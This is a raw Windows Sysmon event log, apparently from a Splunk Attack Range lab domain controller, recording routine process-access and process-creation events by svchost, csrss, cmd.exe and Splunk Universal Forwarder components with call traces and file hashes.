13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-6D00-000000009101}2492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.102{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-6D00-000000009101}2492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.105{10ACEC4A-8556-5FCF-6D00-000000009101}2492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8558-5FCF-7600-000000009101}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8558-5FCF-7600-000000009101}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.945{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8558-5FCF-7600-000000009101}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.748{10ACEC4A-8558-5FCF-7600-000000009101}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8557-5FCF-7500-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8557-5FCF-7500-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8557-5FCF-7500-000000009101}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:28.055{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYST